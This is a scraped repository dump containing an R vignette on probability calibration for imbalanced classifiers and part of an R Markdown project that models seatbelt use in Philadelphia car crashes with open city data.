minority and the majority class. It consists of two parts: Brier score for the positive class, and Brier score for the negative class. They are defined as follows. \n$$BS^+ = \\frac{\\sum_{y_i=\\text{pos_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}$$\n$$BS^- = \\frac{\\sum_{y_i=\\text{neg_label}} (y_i - \\hat{P}(y_i | x_i))^2}{N_{pos}}$$\n\n`stratifiedBrier` function would output a list with three elements: the overall Brier score, the positive Brier socre, as well as the negative Brier score.\n\n```{r}\nstratifiedBrier(y.true, y.prob)\n```\n\n## Calibration Curve\nVisualization usually helps us better understand the problem of the model more quickly and intuitively. In this package, `calibCurve` shows two plots: the top one is the calibration curve along with a perfectly calibrated dashed line, and the bottom one is the histogram of the calibrated probabilities. The corresponding Brier score is shown in the legend. `comparisonPlot` plots the calibration curves from several models or from several calibration methods. \n\nWe now use the dataset `imbalance` to see how the two plotting functions work. In the following, we consider four models: Logistic Regression, Naive Bayes Classifier, Random Forest Classifier, and Support Vector Machine(SVM). For simplity, the default parameters are used. For each model, we plot their individual calibration curve respectively, and then draw a comparison plot. \n\n```{r data}\n# load the dataset and split into train and test\ndata(imbalance)\nset.seed(123)\nsplit <- sample.split(imbalance$y, SplitRatio = 0.75)\ntrain_set <- subset(imbalance, split == TRUE)\ntest_set <- subset(imbalance, split == FALSE)\nX.test <- subset(test_set, select = -y)\ny.test <- subset(test_set, select = y)[,1]\n```\n\n\n```{r lr, fig.height = 6, fig.width = 4.5}\n# Logistic Regression\nlr <- glm(y ~ ., data = train_set, family = \"binomial\")\nprob.lr <- predict(lr, X.test, type = \"response\")\ncalibCurve(y.test, prob.lr, \"Logistic\")\n```\n\n```{r nnb, fig.height = 6, fig.width = 4.5}\n# Naive Bayes\nnb <- naiveBayes(y ~ ., data = train_set)\nprob.nb <- as.data.frame(predict(nb, X.test, type = \"raw\"))$`1`\ncalibCurve(y.test, prob.nb, \"Naive Bayes\")\n```\n\n```{r rfc, fig.height = 6, fig.width = 4.5}\n# Random Forest Classifier\nrfc <- randomForest(as.factor(y) ~ ., data = train_set)\nprob.rfc <- as.data.frame(predict(rfc, X.test, type = \"prob\"))$`1`\ncalibCurve(y.test, prob.rfc, \"Random Forest\")\n```\n\n```{r svc, fig.height = 6, fig.width = 4.5}\n# Support Vector Machine Classifier\nsvc <- svm(formula = as.factor(y) ~ ., \n data = train_set, \n type = 'C-classification', \n kernel = 'linear', probability = TRUE) \npred <- predict(svc, X.test, probability = TRUE)\nprob.svc <- as.data.frame(attr(pred, \"probabilities\"))$`1`\ncalibCurve(y.test, prob.svc, \"SVM\")\n```\n\n```{r comparison, fig.height = 5, fig.width = 5}\ncomparisonPlot(y.test, list(prob.lr, prob.nb, prob.rfc, prob.svc), \n c(\"Logistic Regression\", \"Naive Bayes\", \"Random Forest\", \"SVM\"))\n```\n\n## Bagged Undersampled Calibration\n\n`bagCalibrate` uses the bagged undersampled method to calibrate the probabilities for imbalanced datasets. There are two versions of bagging combination: the weighted average and the simple average, as defined below. To choose which version to use, specify the `ntimes` argument. When `ntimes = 1`, it is the simple average. And when `ntimes > 1`, it is the weighted average, and the weight is obtained using `ntimes` runs on each sampled dataset.\n\n$$\\hat{P}(y_i | x_i) = \\frac{1}{k}\\sum_{j=1}^k \\hat{P}_j(y_i | f_{ij})$$\n$$\\hat{P}(y_i | x_i) = \\frac{1}{z}\\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))} \\hat{P}_j(y_i | f_{ij}),$$\nwhere \n$$z = \\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))}$$\n\n\nModels are trained using `trainset`, and predictions are made on `newX`. `response_name` specifies the name of the response in the trainset, and `model` specifies the model to work on. The function can now work with logistic regression models `'lr'`, naive Bayes models `'nb'`, random forest classifiers `'rf'`, and support vector machine classifiers `'svm'`. `nbags` specifies how many samples sets are used for bagging. Note that a large value will not lead to overfitting and will reduce the variance more, with the only cost being heavy computation load. And to speed up the bagging procedure, parallel computing is enabled. Find the number of cores in your computer, and then set `ncluster`.\n\n```{r args-bagCalibrate}\n# show the arguments of bagCalibrate\nargs(bagCalibrate)\n\n# find the number of cores in your computer\nlibrary(doParallel)\ndetectCores()\n```\n\nHere, we use SVM as an example, and compare the standard calibration method with the bagged undersampled method. Note that the same formula of SVM is used for both methods. As the stratified Brier scores suggest, the bagged undersampled method can greatly mitigate the effect of imbalance in the positive class calibration, without much sacrifice in the negative class and the overall.\n\n```{r standard-svm}\n# standard probability calibration\nsvc <- svm(formula = as.factor(y) ~ ., data = train_set, \n type = 'C-classification', kernel = 'linear', probability = TRUE) \npred <- predict(svc, X.test, probability = TRUE)\nprob.svc <- as.data.frame(attr(pred, \"probabilities\"))$`1`\nstratifiedBrier(y.test, prob.svc)\n```\n\n```{r bag-svm}\n# simple version of bagged undersampled calibration\nbag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', \n type = 'C-classification', kernel = 'linear', \n nbags = 30, ntimes = 1, ncluster = 4)\nstratifiedBrier(y.test, bag.prob.svm)\n```\n\n```{r weighted-bag-svm}\n# weighted version of bagged undersampled calibration\nweighted.bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', \n type = 'C-classification', kernel = 'linear', \n nbags = 30, ntimes = 20, ncluster = 4)\nstratifiedBrier(y.test, weighted.bag.prob.svm)\n```\n\n```{r comp-svm, fig.height = 5, fig.width = 5}\ncomparisonPlot(y.test, list(prob.svc, bag.prob.svm, weighted.bag.prob.svm), \n c(\"SVM\", \"bagged-under SVM\", \"Weighted-bagged-under SVM\"), nbins = 8)\n```\n\n\n## References:\n\n1. Wallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data. Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n2. Alexandru Niculescu-Mizil and Rich Caruana. 2005. Predicting good probabilities with supervised learning. In Proceedings of the 22nd international conference on Machine learning (ICML ’05). Association for Computing Machinery, New York, NY, USA, 625–632. DOI:https://doi.org/10.1145/1102351.1102430\n3. [sklearn documentation: Probability Calibration](https://scikit-learn.org/stable/modules/calibration.html#calibration)\n\n" } ]
58
robi86/Masters-Project-Work
https://github.com/robi86/Masters-Project-Work
949c485f11a00d502cc39c062a052f4b5f2c04a9
61ecd71d1907a5d98b72407ef39ae7dad19b4ee5
518728c492e0335e8865a20915e7cd32c89c6f8c
refs/heads/master
2021-09-07T19:34:40.327101
2018-02-27T23:59:05
2018-02-27T23:59:05
114,930,363
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.782608687877655, "alphanum_fraction": 0.782608687877655, "avg_line_length": 90, "blob_id": "1f6b5d2cba58e1e72de7503a26c3539d6d6a30ca", "content_id": "2e1aaf93f331c9ef5518b10a617fef8919a0e165", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 90, "num_lines": 1, "path": "/Introduction to Data Mining/Final/Raw Data/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains the raw data for the final project. This data comes from CMS and CDC. \n" }, { "alpha_fraction": 0.8269230723381042, "alphanum_fraction": 0.8269230723381042, "avg_line_length": 50, "blob_id": "1a366e84d645bdace19ad962938d09d489e1b819", "content_id": "b2e28267e01804643cd301ed47bfc7955b662eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 50, "num_lines": 1, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/Visualizations/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Figures for parameter tuning and cross validation. \n" }, { "alpha_fraction": 0.7831325531005859, "alphanum_fraction": 0.7831325531005859, "avg_line_length": 81, "blob_id": "0a2eabe6f4df38775ad9e04541fb07a49526f5da", "content_id": "13fc279478e46ff58357e7efa3eb217259f50d15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 81, "num_lines": 1, "path": "/Machine Learning I/Midterm/README.rmd", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains code, a report, and a presentation for the mid-term project. \n" }, { "alpha_fraction": 0.6685097217559814, "alphanum_fraction": 0.6979392766952515, "avg_line_length": 61.83103561401367, "blob_id": "d8b9d48fc39cc5fab54fb10e38a78989962110f2", "content_id": "bdd583664b05ca68463971661ce96a5a9607f543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 72886, "license_type": "no_license", "max_line_length": 845, "num_lines": 1160, "path": "/Introduction to Data Science/Final_Project_Code.rmd", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "\n---\ntitle: \"Predicting Seatbelt Use in Philadelphia Automobile Crashes\"\nauthor: \"David Robison\"\ndate: \"April 24, 2017\"\noutput:\n html_document: default\n---\n\n```{r setup, include=FALSE}\nknitr::opts_chunk$set(echo = TRUE)\n```\n\nGeorge Washington University DATS 6101 - Final Project: Logistic Regression for Modeling Crashes in Philadelphia by David Robison\n\n### Research Question: In the City of Philadelphia between 2011 - 2014, based on potential risk factors recorded at the time of an automobile accident, what is the probability that an occupant of a vehicle was not wearing a seatbelt?\n\nAs a final project for DATS 6101: Introduction to Data Science, our group chose to further investigate seatbelt use among automobile occupants involved in car accidents in the City of Philadelphia between 2011 - 2015. This analysis is a follow-on to our initial work conducted in February 2017. In that analysis, using the same dataset, we sought to answer whether seatbelt use varied by age and gender of the drivers and passengers involved in an accident.\n\nAfter considerable data cleaning, we performed Pearson's chi-square tests on our Age Group and Sex variables. In each test, the resulting p-value was highly significant providing enough evidence to reject the null hypothesis that seatbelt use is not independent of age or sex of the occupant. To extend this work, we now will try to identify additional risk factors for not wearing a seatbelt. From the identified variables, we will then try to fit a model that can accurately predict the binomial outcome of whether or not an occupant involved in the accident was wearing their seatbelt. \n\nThe datasets and metadata for this and the prior analysis can be found at: http://metadata.phila.gov/#home/datasetdetails/5543865420583086178c4eba/. For this analysis, we use three datafiles: the Collision Data - Persons Table, Collision Data - Crash Shapefile, and the Roadway Table. The Collisions Data - Persons Table was used to verify that seatbelt use varies by Age and Sex. \n\nThe Collisions Data - Crash Shapefile and Roadway Table are the new datasets that will be used to extend the number of variables in our data. These datasets are merged using an inner join on the Crash Reference Number (CRN), which provides a unique identifier for each crash record across the separate data files. \n\nThe analysis begins in Section 2 and provides some of the exploratory data analysis (EDA) and findings from the first project. In Section 3 & 4, the new data files are merged with the final dataframe from the mid-term and an EDA of the new variables is conducted before model fitting in Section 6 & 7. \n\n### 1. Installing & Loading Modules/Packages\n\nThis section installs the necessary graphing and statistical packages. \n\n```{r, echo = TRUE}\n# plyr: tables, revaluing\nif (!is.element(\"plyr\", installed.packages()[,1]))\n install.packages(\"plyr\", dependencies = TRUE)\n require(\"plyr\", character.only = TRUE)\n\n# dplyr: tables, revaluing\nif (!is.element(\"dplyr\", installed.packages()[,1]))\n install.packages(\"dplyr\", dependencies = TRUE)\n require(\"dplyr\", character.only = TRUE)\n\n# car: companion to applied regression\nif (!is.element(\"car\", installed.packages()[,1]))\n install.packages(\"car\", dependencies = TRUE)\n require(\"car\", character.only = TRUE)\n\n# ggplot2: visuals\nif (!is.element(\"ggplot2\", installed.packages()[,1]))\n install.packages(\"ggplot2\", dependencies = TRUE)\n require(\"ggplot2\", character.only = TRUE)\n\n# ROCR: visuals for classifier performance\nif (!is.element(\"ROCR\", installed.packages()[,1]))\n install.packages(\"ROCR\", dependencies = TRUE)\n require(\"ROCR\", character.only = TRUE)\n\n# pRoc: visualizing ROC curves\nif (!is.element(\"pROC\", installed.packages()[,1]))\n install.packages(\"pROC\", dependencies = TRUE)\n require(\"pROC\", character.only = TRUE)\n\n# bestglm: best subset glm using information criteria or cross-validation\nif (!is.element(\"bestglm\", installed.packages()[,1]))\n install.packages(\"bestglm\", dependencies = TRUE)\n require(\"bestglm\", character.only = TRUE)\n\n# pscl: Political Science Computational Laboratory, Stanford University\nif (!is.element(\"pscl\", installed.packages()[,1]))\n install.packages(\"pscl\", dependencies = TRUE)\n require(\"pscl\", character.only = TRUE)\n\n# rgl: 3D Visualization Using OpenGL\nif (!is.element(\"rgl\", installed.packages()[,1]))\n install.packages(\"rgl\", dependencies = TRUE)\n require(\"rgl\", character.only = TRUE)\n\n# visreg\nif (!is.element(\"visreg\", installed.packages()[,1]))\n install.packages(\"visreg\", dependencies = TRUE)\n require(\"visreg\", character.only = TRUE)\n\nif (!is.element(\"forcats\", installed.packages()[,1]))\n install.packages(\"forcats\", dependencies = TRUE)\n require(\"forcats\", character.only = TRUE)\n```\n\n### 2. Loading & Cleaning Midterm Data Set\nThe code below is from the analysis conducted for the mid-term project. This section is meant to be a refresher. It includes the EDA of the Age variable from the Collision Data - Persons Table followed by the steps taken to cleanse the data, graphical representations of seatbelt use by age, and results of the chi-square test. It is important to note that driver and passenger seatbelt use is contained in the Collisions Data - Persons Table.\n\n```{r}\n# Philadelphia Persons Crash dataset, loaded from Philadelphia Metadata Catalog.\npersons <- read.csv(url(\"http://data.phl.opendata.arcgis.com/datasets/5ba1194f422e488e8549f8d96b788033_1.csv\"))\nstr(persons)\n\n# Begin cleaning of Persons dataset, resulting in crashes data frame\npersons_clean <- subset(persons, PERSON_TYPE == 1 | PERSON_TYPE == 2) # select either driver or passenger\npersons_clean <- subset(persons_clean, AGE != 99 & AGE != 98) #or, AGE < 98\npersons_clean <- subset(persons_clean, !(AGE == 1 & PERSON_TYPE == 1)) # remove age 1 drivers\npersons_clean$restraint_used <- mapvalues(persons_clean$RESTRAINT_HELMET, from = c(\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"10\", \"11\", \"12\", \"90\", \"99\"), to = c(\"None Used/NA\", \"Shoulder Belt\", \"Lap Belt\", \"Lap and shoulder belt\", \"Child safety seat\", \"Motorcycle helmet\", \"Bicycle helmet\", \"Improperly used safety belt\", \"Improperly used child safety seat\", \"Improperly used helmet\", \"Restraint used, unknown type\", \"Unknown\"))\n\n#PERSON_TYPE: 1 - Driver, 2 - Passenger, 7 - Pedestrian, 8 - Other, 9 - Unknown\n\npersons_clean$Involvement <- mapvalues(persons_clean$PERSON_TYPE, from = c(\"1\", \"2\", \"7\", \"8\", \"9\"), to = c(\"Driver\", \"Passenger\", \"Pedestrian\", \"Other\", \"Unknown\"))\n\ndropageU <- subset(persons_clean, SEX==\"M\" | SEX==\"F\", drop = TRUE) # 7 blank sex entries too..\n\ncrashes <- subset(dropageU, (RESTRAINT_HELMET != 5 & RESTRAINT_HELMET != 6 & RESTRAINT_HELMET != 12 & RESTRAINT_HELMET != 99)) \n\ncrashes$seatbelt <- recode(crashes$restraint_used, 'c(\"Child safety seat\", \"Lap Belt\", \"Lap and shoulder belt\", \"Restraint used, unknown type\", \"Shoulder Belt\") = \"Yes\"; c(\"Improperly used child safety seat\", \"Improperly used safety belt\", \"None Used/NA\") = \"No\" ')\n\ncrashes$SEX <- droplevels(crashes$SEX)\n\n# INITIAL EXPLORATORY DATA ANALYSIS FROM MIDTERM \nboxplot(x = crashes$AGE, main = \"Ages Boxplot - Philadelphia Crash Data\", \n horizontal = TRUE)\n\ncrashes$AgeGroup <- cut(crashes$AGE, c(0,15,20,26,32,50,75,99), \n labels = c(\"Youth\", \"Teenager\", \"Early Twenties\", \n \"Late Twenties/Early Thirties\", \"Early Middle Age\",\n \"Middle Age\", \"Senior\"))\nage_chi = table(crashes$AgeGroup, crashes$seatbelt)\nage_chi\nchisq.test(age_chi)\n#Create a dataframe of percent frequency of our seatbelt use categories for each age group\nageBeltFreq <- crashes %>%\n group_by (AgeGroup, seatbelt) %>%\n summarise (n=n()) %>%\n mutate(Freq = (n / sum(n)) * 100)\n\nageBeltFreq_df <- as.data.frame(ageBeltFreq)\n\n#Plot the seatbelt use percent frequency and age group relationship in two different wys\n\nggplot(crashes, aes(AgeGroup, fill=seatbelt) ) +\n geom_bar(position=\"dodge\") + \n ggtitle(\"Seatbelt Use by Age Group\") +\n theme(plot.title = element_text(size=12, hjust=0.5), legend.position = \"top\",\n legend.title = element_blank(), axis.title.x = element_blank(), \n axis.text.x = element_text(angle = 45, hjust = 1))+ylab(\"Count\")\n\nggplot(ageBeltFreq_df, \n aes(x = ageBeltFreq_df$AgeGroup, y = ageBeltFreq_df$Freq, \n label = round(Freq,2)))+geom_count(aes(ageBeltFreq_df$AgeGroup,\n ageBeltFreq_df$Freq, \n fill = seatbelt, colour = seatbelt),\n size = 7) +\n theme(plot.title = element_text(hjust = 0.5),legend.position = \"top\", \n axis.text.x = element_text(angle = 45, hjust = 1)) +\n ylab(\"Percent Frequency\") + \n theme(axis.title.x = element_blank(), \n legend.title = element_blank()) + \n ggtitle(\"Seatbelt Use by Age Group (% Frequency)\")+geom_text(size= 3)\n```\n\n### 3. Read in new datsets\n\nTo begin the follow-on analysis, we'll read in two new dataframes from the City of Philadelphia. The first is a Crash File that has variables related to the crash itself such as time of day, weather, etc. The second new data source is the Roadway Table that provides descriptions about the road where the crash happened. For example, the speed limit and the number of lanes. \n\n```{r}\n#Create the crash data frame, loaded from Philadelphia Metadata Catalog.\ncrashDf <- read.csv(url(\"http://data.phl.opendata.arcgis.com/datasets/5ba1194f422e488e8549f8d96b788033_0.csv\"))\n\n\n#Subset the crash dataframe for the potential predictor variables that we are interested in\ncrashDf <- subset(crashDf, select = c(\"CRN\", 'HOUR_OF_DAY', \"DAY_OF_WEEK\",\n'TIME_OF_DAY',\n'CRASH_MONTH',\n'WEATHER',\n\"ROAD_CONDITION\",\n\"LATITUDE\", \n\"LONGITUDE\"\n))\n\n#Create the roadway data frame, loaded from Philadelphia Metadata Catalog.\nroadwayDf <- read.csv(url(\"http://data.phl.opendata.arcgis.com/datasets/5ba1194f422e488e8549f8d96b788033_3.csv\"))\n\n#subset the roadway dataframe\nroadwayDf <- subset(roadwayDf, select = c(\"CRN\", \"LANE_COUNT\", \"SPEED_LIMIT\"))\nroadwayDf <- subset(roadwayDf, !duplicated(CRN))\n\n```\n\n\n### 4. Merge Two New Data Sources (RoadwayDf, CrashesDf) with the Final Dataframe from the Midterm Proect (Crashes)\n\nWith the two new data files stored as dataframes and the desired columns selected, we next combine them with the final dataframe from the mid-term - 'crashes' - using an inner join on the Crash Reference Number (CRN) column. Again, it is important to recall that driver and passenger seatbelt use is contained in the 'crashes' dataframe. Therefore, by using an inner join on the CRN, we create a dataframe that in addition to seatbelt use has new variables that are unique to either a driver or passenger involved in an accident. This new dataframe 'persons_crashes_roadway_innerjoin' will serve as the primary data set for the remainder of the analysis. \n\n```{r}\n# First merge our 'Crashes' dataframe i.e. cleaned persons dataframes with the raw crash shapefile \nperson_crashes_innerjoin <- inner_join(crashes, crashDf, by = c(\"CRN\" = \"CRN\"))\nperson_crashes_roadway_innerjoin <- inner_join(person_crashes_innerjoin, roadwayDf, by = c(\"CRN\" = \"CRN\"))\n\n#Save both dataframes as a CSV file\nwrite.csv( person_crashes_roadway_innerjoin, file = \"person_crashes_roadway_innerjoin.csv\")\nstr(person_crashes_roadway_innerjoin)\n```\n\n\n### 5. EDA of Newly Added Variables Merged into Crashes_Persons_Roadway_InnnerJoin Data Frame, including Lane Count, Speed Limit, Hour of Day, Day of Week\n\nThe new primary dataframe is called crashes_persons_roadway_innerjoin. For our explanatory data analysis, we'll copy this into a new data frame called newEDADf. After the EDA, we'll come back and modify the person_crashes_roadway_innerjoin based upon our observations. Overall, we are trying to identify variables that are coded as unknown or do not make sense. These 'noisy' observations will need to be removed before we begin model fitting. \n\n```{r}\nnewEDADf <- person_crashes_roadway_innerjoin\n\nstr(newEDADf)\n```\n\nWe've added variables for the Lane Count, Speed Limit, Hour of Day, Day of Week, Crash Month, Weather, and Road Condition. \nLet's use histograms and the table function to look at the distribution of the new variables and see if we can identify variables coded as unknown. \n```{r}\npar(mfrow = c(2,2))\n\nhist(newEDADf$LANE_COUNT, breaks = 100, xlim = c(0,8), main = \"Lane Count\", xlab = NULL) #Note we are excluding lane counts above 8\n\nhist(newEDADf$SPEED_LIMIT, main = \"Speed Limit\", xlab = NULL)\n\nhist(newEDADf$HOUR_OF_DAY, breaks = 24, xlim = c(0,25), main = \"Hour of Day\", xlab = NULL)\n\nhist(newEDADf$DAY_OF_WEEK, breaks = 14, main = \"Day of Week\", xlab = NULL)\nprint(\"Lane Count\")\ntable(newEDADf$LANE_COUNT)\nprint(\"Speed Limit\")\ntable(newEDADf$SPEED_LIMIT)\nprint(\"Hour of Day\")\ntable(newEDADf$HOUR_OF_DAY)\nprint(\"Day of the Week\")\ntable(newEDADf$DAY_OF_WEEK)\n```\n\nWe observe that most of our data is from crashes on road with 2 LANES OR LESS and a speed limit BELOW 35 MPH. In addition, crashes by hour of day shows a normal distribution centered around ~3:00 PM with an equal distribution across the days of the week. \n\nLooking at the tables we see that lane goes from 1-99, so we need to drop some of these variables. In Hour of Day, we need to drop 99. \n\nLet's continue to use histograms and tables to look at the distribution of Road Condition & Weather\n```{r}\npar(mfrow = c(2,1))\n\nhist((newEDADf$ROAD_CONDITION), breaks = 8, main = \"Road Condition\", xlab = NULL)\nhist(newEDADf$WEATHER, breaks = 8, main = \"Weather\", xlab = NULL)\n\ntable(newEDADf$WEATHER) \n\ntable(newEDADf$ROAD_CONDITION) \n```\n\nFrom the table, we see that weather is coded using 10 categories, including a -1. These will later need to be combined into larger categories. Most of the dataset is coded with a 1 under the weather variable, signifying Clear weather. From the Road_Condition table, we see 9 different road conditions. The descriptions are similar to weather condition and might have some collinearity. For our model we'll likely exclude one of these. \n\nNext, we'll take a look at Hour of Day and Seatbelt Use in the entire dataset with a table. A table object can be passed to the plot function to help visualize the relationship of the two variables. \n```{r}\nhours_table <- table(newEDADf$HOUR_OF_DAY,\n newEDADf$seatbelt)\nplot(hours_table)\n```\nTo the naked eye, it looks like evening and early morning hours starting around 7:00 PM (17) and until 3:00 AM (3) have higher proportions of seatbelts not worn. \n\nWe'll also plot a table of Weather and Seatbelt Use.\n```{r}\nweather_table <- table(newEDADf$WEATHER,\n newEDADf$seatbelt)\nplot(weather_table)\n```\nThis plot is less conclusive. To the naked eye, there does not appear be be a visible difference in seatbelt use by Weather. \n\nWe've gotten a sense of some of our distributions as well as clues as to divisions in seatbelt usage within weather and hour of day variables. We'll dig into these divisions further. \n```{r}\n#Update Lane Count to Drop anything above 6 and then plot combined table\nnewEDADf <- subset(newEDADf, LANE_COUNT == 1 | LANE_COUNT == 2 | LANE_COUNT == 3 | LANE_COUNT == 4 | LANE_COUNT == 5 | LANE_COUNT == 6, drop = TRUE)\nlane_count_table <- table(newEDADf$LANE_COUNT, newEDADf$seatbelt)\nplot(lane_count_table) \n\n#Let's look at seatbelt use and Road Speed via new speed category variable, then plot table\nnewEDADf$Speed_Category <- cut(newEDADf$SPEED_LIMIT, c(0,35,65), labels = c(\"Low Speed\", \"High Speed\"))\nlane_count_speed <-table(newEDADf$Speed_Category, newEDADf$seatbelt)\nplot(lane_count_speed) \n\n#LOOK AT WEATHER AND SEATBELT USE, FIRST REGROUP WEATHER AS FACTOR AND CREATE NEW LEVELS\nnewEDADf$WEATHER <- factor(newEDADf$WEATHER, labels = c('Unknown -1', 'Clear', 'Rain', 'Sleet', 'Snow', 'Fog', 'Rain and fog', 'Sleet and fog', 'Other', 'Unknown'))\nlevels(newEDADf$WEATHER) <- list(Other = c(\"Unknown -1\", \"Unknown\", \"Other\"), Clear = \"Clear\", \n Rain_Fog = c(\"Rain\", \"Rain and fog\", \"Fog\"), \n Snow = c(\"Sleet\", \"Snow\", \"Sleet and fog\"))\nweather_belt <- table(newEDADf$WEATHER, newEDADf$seatbelt) \nplot(weather_belt)\n\ninvolvement_belt <- table(newEDADf$Involvement, newEDADf$seatbelt)\nplot(involvement_belt) \ninvovlement_lane_seatbelt <- table(newEDADf$Involvement, newEDADf$LANE_COUNT, newEDADf$seatbelt)\nplot(invovlement_lane_seatbelt) \n```\n\nIn the lane_count_table, it looks like seatbelts are worn less often on roads with a lane_count of 1 or 2. In lane_count_speed, it appears that seatbelts are worn less often in our 'Low Speed' category', which we defined as roads 35 MPH or less. In Weather_belt, there does not seem be to any consistent associations with weather and Seatbelt Use after we redruced the number of categories to Clear, Rain_Fog, Snow, and Other. In Involvement_Belt, we see we have more drivers in our dataset, but a significant portion of passengers were also not wearing seatbelts. Finally, Involvement_lane_seatbelt, shows that passenger and driver behavior are similar in that most do not wear seat belts in roadways with a lane count of 1 or 2. \n\nLet's look further at behavior for Male/Female and Driver/Passenger Behavior by HOUR_OF_DAY\n```{r}\nlibrary(gridExtra)\nnewEDADf <- subset(newEDADf, HOUR_OF_DAY < 99, drop = TRUE) #Drop Hour of Day that is Unknown and coded as 99. \n\ngraph4 <- ggplot(newEDADf,\n aes(x=newEDADf$HOUR_OF_DAY,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$SEX)+theme(legend.position=\"none\", axis.title.x = element_blank(), plot.title = element_text(hjust = 0.5))+ggtitle(\"Occupant Behavior by Time of Day\")\n \ngraph2 <- ggplot(newEDADf,\n aes(x=newEDADf$HOUR_OF_DAY,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$Involvement)+xlab(\"Hour of Day\")+theme(legend.position=\"bottom\")+labs(fill = \"Seatbelt Use\")\n\ngrid.arrange(graph4, graph2, ncol = 1)\n```\n\nFrom these plots it appears that the behavior of Males and Females across the Hours of the Day is similar with regards to wearing a seatbelt. The Driver versus Passenger plot does not present any clear conclusions.\n\nWe'll now look at behavior for Male/Female and Driver/Passenger by Lane Count. \n```{r}\ngraph3 <- ggplot(newEDADf,aes(x=newEDADf$LANE_COUNT,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$SEX)+theme(legend.position=\"none\",\n axis.title.x = element_blank(), plot.title = element_text(hjust = 0.5))+ggtitle(\"Occupant Behavior by Lane Count\")\n\ngraph1 <- ggplot(newEDADf,aes(x=newEDADf$LANE_COUNT,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$Involvement)+xlab(\"Lane Count\")+theme(legend.position=\"bottom\")+labs(fill = \"Seatbelt Use\")\n\ngrid.arrange( graph3, graph1, ncol=1)\n```\n\nFor Lane_Count, we see a similar behavior between Males and Females and Drivers Passengers in that seatbelts are most often not worn crashes occurs on roads with a Lane_Count of 2 or less. \n\nNext, we'll look occupants behavior by Age Group and Hour of Day. \n```{r}\nggplot(newEDADf,aes(x=newEDADf$HOUR_OF_DAY,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$AgeGroup)+theme(legend.position = 'bottom', plot.title = element_text(hjust = 0.5)\n )+xlab(label = \"Hour of the Day\")+labs(fill = \"Seatbelt Use\")+ggtitle(\"Behavior by Age Group and Hour of Day\")\n```\n\nWe see our data set has more \"Early Middle Age\" than any other age group, and crashes peaks around 3:00 PM - 6:00 PM. Across all age groups, the number of accidents seems to show a similar pattern. However, by eye it is difficult to distinguish which hours of the day have greatest lack of seatbelt use. \nLet's make one more set of visualizations using a mosaic plot. Visually, these are a bit clunky, but they are extremely informative. Mosaic plots include standardized residuals. The standardized residual is a ratio of the difference between observed and expected counts with a Null Hypothesis that the variables are independent. In our case, the Null hypothesis is that the frequency of seatbelt use is independent of the Hour of Day. If the standardized residual is less than -2, the cells observed frequency is less than the expected frequency. If greater than 2, the observed frequency is greater than the expected frequency.\n```{r}\nmosaicplot(table(newEDADf$Involvement, newEDADf$seatbelt, newEDADf$HOUR_OF_DAY),main = \"Occupant Involvement vs. Hour of Day\", shade = TRUE)\n\nmosaicplot(table(newEDADf$SEX, newEDADf$seatbelt, newEDADf$HOUR_OF_DAY), main = \"Occupant Sex vs. Hour of Day\",shade = TRUE)\n```\n\nThese plots show us a lot of information. Let's take a moment to review them closely. For Occupant Sex vs. Hour of Day, we see that for females the hours of 0 - 3 have a standardized residual of < -2 for Seatbelt Use = Yes. This tells us that observed frequency of seatbelt use here is less than the expected frequency. For Males, we see that the hours of 7:00 - 5:00 AM have a standardized residual of greater than 2 for Seatbelt Use = No i.e. the observed frequency is greater than the expected frequency. This tells us that we can reject the null hypothesis and be confident that for Male occupants seatbelt use is less during nighttime and early morning hours. \n\nIn the Occupant Involvement vs Hour of the Day, both the plots for drivers and passengers seem to indicate a somewhat similar pattern. The driver plot shows standardized residuals less than -2 in the Yes category for several nighttime and early morning hours. In the passenger plot, we see a number of standardized residuals greater than 2 for the No Category.\n\nThese plots are useful as they allow us to infer that we can collapse this variable from 24 hours into a two level categorical variable such as night and day. We have now completed our Exploratory Data Analysis are ready to begin processing our data and preparing it for model building. \n\n### 6. Processing Dataframe for Model Building\n\nFirst, we'll convert all of the variables that we need to be factors and set labels and levels. In some cases, we'll drop levels that are coded as unknown e.g., Hour of Day = 99 or would add noise e.g., roads with a Lane Count greater than 6. \n```{r}\n#Set variables to factors and add level labels: \nperson_crashes_roadway_innerjoin$CRASH_MONTH <- factor(person_crashes_roadway_innerjoin$CRASH_MONTH, labels = c(\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"))\n\nperson_crashes_roadway_innerjoin$DAY_OF_WEEK <- factor(person_crashes_roadway_innerjoin$DAY_OF_WEEK, labels = c(\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"))\n\nperson_crashes_roadway_innerjoin$ROAD_CONDITION <- 